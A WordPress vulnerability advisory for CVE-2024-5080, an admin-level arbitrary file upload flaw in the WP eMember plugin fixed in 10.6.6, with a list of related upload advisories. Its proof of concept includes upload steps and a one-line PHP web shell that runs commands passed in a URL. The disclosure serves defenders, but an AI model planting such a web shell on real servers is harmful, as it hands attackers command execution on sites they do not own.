WP eMember < 10.6.6 – Admin+ Arbitrary File Upload | CVE 2024-5080 | Plugin Vulnerabilities

Description

The plugin does not validate files to be uploaded, which could allow admins to upload arbitrary files such as PHP on the server

Proof of Concept

1. Go to https://example.com/wp-admin/admin.php?page=eMember_admin_functions_menu&tab=2
2. Click the checkbox next to "Enable/Disable eMember Folder Protection" and click "update"
3. Click "Upload a file"
4. Select a PHP file. In this case, use one called `cmd.php` with the content: `<?php echo system($_GET['cmd']); ?>`
5. Go to https://example.com/wp-content/uploads/emember/downloads/cmd.php?cmd=ls

Affects Plugins

Fixed in 10.6.6

References

CVE

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

15f78aad-001c-4219-aa7e-46537e1357a2

Timeline

Publicly Published

2024-06-22 (about 1 year ago)

Added

2024-06-22 (about 1 year ago)

Last Updated

2024-06-22 (about 1 year ago)

Other

Published

Title

Published

2025-04-21

Title

Greenshift 11.4 - 11.4.5 - Authenticated (Subscriber+) Arbitrary File Upload

Published

2014-08-01

Title

wp-catpro - Arbitrary File Upload

Published

2015-04-09

Title

Windows Desktop And iPhone Photo Uploader <= 1.8 - File Upload

Published

2023-11-20

Title

WP Child Theme Generator < 1.1.3 - Admin+ Arbitrary File Upload

Published

2024-10-15

Title

File Manager Pro < 8.3.10 - Unauthenticated Backup File Download and Upload